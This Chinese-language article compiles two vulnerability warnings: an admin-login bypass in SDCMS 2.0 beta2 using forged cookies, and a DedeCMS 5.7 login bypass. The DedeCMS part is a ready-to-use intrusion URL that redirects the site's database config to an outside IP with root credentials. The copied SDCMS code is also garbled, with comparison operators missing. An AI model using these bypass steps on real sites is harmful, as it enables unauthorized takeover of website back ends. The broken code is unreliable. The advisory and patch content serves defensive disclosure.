SDCMS后台绕过直接进入,一种不常见的设计失误案例漏洞预警

【简介】感谢网友“Mimi胖真棒”参与投稿，下面是小编为大家整理的SDCMS后台绕过直接进入,一种不常见的设计失误案例漏洞预警（共2篇），仅供参考，喜欢可以收藏与分享哟!

篇1：SDCMS后台绕过直接进入,一种不常见的设计失误案例漏洞预警

简要描述：

SDCMS后台绕过直接进入：测试版本2.0 beta2 其他版本未测试

详细说明：

Islogin //判断登录的方法

sub islogin

if sdcms.strlen(adminid)=0 or sdcms.strlen(adminname)=0 then

dim t0,t1,t2

t0=sdcms.getint(sdcms.loadcookie(“adminid”),0) loadcookie

t1=sdcms.loadcookie(“islogin”)

t2=sdcms.loadcookie(“loginkey”)

if sdcms.strlen(t0)=0 or sdcms.strlen(t1)=0 or sdcms.strlen(t2)50 then //这里判断很 sdcms.strlen(t2)50 loginkey 没有任何要求 只需要输入50个即可往下执行

//

sdcms.go “login.asp?act=out”

exit sub

else

dim data

data=sdcms.db.dbload(1,“adminid,adminname,adminpass,islock,groupid,g.pagelever,g.catearray,g.catelever”,“sd_admin u left join sd_admin_group g on u.groupid=g.id”,“adminid=”&t0&“”,“”) //根据管理员ID查询 ID可控

if ubound(data)<0 then

sdcms.go “login.asp?act=out”

exit sub

else

if instr(data(1,0)&data(2,0),sdcms.decrypt(t1,t2))<0 or data(3,0)=0 then

sdcms.go “login.asp?act=out”

exit sub

else

adminid=data(0,0)

adminname=data(1,0)

admin_page_lever=data(5,0)

admin_cate_array=data(6,0)

admin_cate_lever=data(7,0)

if sdcms.strlen(admin_page_lever)=0 then admin_page_lever=0

if sdcms.strlen(admin_cate_array)=0 then admin_cate_array=0

if sdcms.strlen(admin_cate_lever)=0 then admin_cate_lever=0

if clng(admingroupid)0 then

admin_lever_where=“ and menuid in(”&admin_page_lever&“)”

end if

sdcms.setsession “adminid”,adminid

sdcms.setsession “adminname”,adminname

sdcms.setsession “admingroupid”,data(4,0)

end if

end if

end if

else

data=sdcms.db.dbload(1,“g.pagelever,g.catearray,g.catelever”,“sd_admin u left join sd_admin_group g on u.groupid=g.id”,“adminid=”&adminid&“”,“”)

if ubound(data)<0 then

sdcms.go “login.asp?act=out”

exit sub

else

admin_page_lever=data(0,0)

admin_cate_array=data(1,0)

admin_cate_lever=data(2,0)

if sdcms.strlen(admin_page_lever)=0 then admin_page_lever=0

if sdcms.strlen(admin_cate_array)=0 then admin_cate_array=0

if sdcms.strlen(admin_cate_lever)=0 then admin_cate_lever=0

if clng(admingroupid)0 then

admin_lever_where=“ and menuid in(”&admin_page_lever&“)”

end if

end if

end if

end sub

漏洞证明：

看看操作COOKIE的函数

public function loadcookie(t0)

loadcookie=request.cookies(prefix&t0)

end function

public sub setcookie(byval t0,byval t1)

response.cookies(prefix&t0)=t1

end sub

prefix

'变量前缀，如一个空间下多次使用本程序的话，请每个程序配置不同的值

dim prefix

prefix=“1Jb8Ob”

'这个值访问一下admin/login.asp?act=out 便可得到 在COOKIE里

sub out

sdcms.setsession “adminid”,“”

sdcms.setsession “adminname”,“”

sdcms.setsession “admingroupid”,“”

sdcms.setcookie “adminid”,“”

sdcms.setcookie “loginkey”,“”

sdcms.setcookie “islogin”,“”

sdcms.go “login.asp”

end sub

利用方法：设置cookie prefixloginkey 50个字符 prefixislogin 随意 循环下prefixadminid 即可 默认1 然后访问后台，就可以了！

修复方案：

修改函数！

篇2：DedeCms v5.65.7 爆严重安全漏洞 免账号密码直接进入后台漏洞预警

入侵步骤如下：

www.xx.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root

把上面黑底黄字上的字母改为当前的验证码，即可直接进入网站后台。

小编分析了一下，此漏洞的前提是必须得到后台路径才能实现，因此大家一定要养成使用DEDECM建站时改后台名字的习惯。下面给出官方的解决办法：

解决办法：

找到include/common.inc.php文件，把：

foreach($_REQUEST as $_k=>$_v)

{

var_dump($_k);

if( strlen($_k)>0 && preg_match('#^(cfg_|GLOBALS)#',$_k) )

{

exit('Request var not allow!');

}

}

换成：

//检查和注册外部提交的变量

function CheckRequest(&$val) {

if (is_array($val)) {

foreach ($val as $_k=>$_v) {

CheckRequest($_k);

CheckRequest($val[$_k]);

}

} else

{

if( strlen($val)>0 && preg_match('#^(cfg_|GLOBALS)#',$val) )

{

exit('Request var not allow!');

}

}

}

CheckRequest($_REQUEST);